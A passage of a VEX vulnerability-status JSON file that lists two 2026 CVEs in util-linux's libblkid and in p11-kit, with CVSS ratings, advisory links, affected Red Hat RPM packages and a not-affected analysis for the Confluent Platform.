        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-13595",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A flaw was found in the libblkid library of util-linux. During nested partition probing, the BSD, Minix, Solaris x86, and UnixWare partition probers cache a raw pointer to a parent partition entry in a dynamically allocated array. When subsequent partition additions cause the array to be reallocated, this pointer becomes stale, leading to a heap use-after-free read. An attacker who can present a crafted block device image (for example, via USB insertion or a loop-mounted disk image) can trigger this flaw without user interaction, as libblkid is invoked automatically by udev/udisks as root on block-device hot-plug events. This could lead to limited information disclosure or denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13595"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26573"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13595"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494101"
        },
        {
          "url": "https://github.com/util-linux/util-linux/commit/c0186f14fbdb02f64c8e0ba701ce727ea764ff4c"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13595"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13595"
        }
      ],
      "published": "2026-06-29T09:16:28+00:00",
      "updated": "2026-07-08T03:37:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-13757",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in p11-kit. The RPC message attribute parsing functions p11_rpc_message_get_attribute() and p11_rpc_message_get_attribute_array_value() form a mutually-recursive call chain with no recursion depth limit when processing nested CKA_WRAP_TEMPLATE, CKA_UNWRAP_TEMPLATE, and CKA_DERIVE_TEMPLATE attributes. An unauthenticated attacker with local access to the p11-kit RPC Unix domain socket can send a specially crafted request with deeply nested template attributes, causing stack exhaustion and crashing the p11-kit server process and its dependent services.",
      "recommendation": "Upgrade p11-kit to version 0.26.4-1.el9_8; Upgrade p11-kit-trust to version 0.26.4-1.el9_8",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37469"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49667"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49668"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53371"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13757"
        },
        {
          "url": "https://bugzilla.redhat.com/2494556"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494556"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-13757"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-49667.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:49668"
        },
        {
          "url": "https://github.com/advisories/GHSA-p2wm-69qx-x25w"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-13757.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-49668.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13757"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13757"
        }
      ],
      "published": "2026-06-29T19:16:40+00:00",
      "updated": "2026-08-13T21:17:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.26.2-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.26.2-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
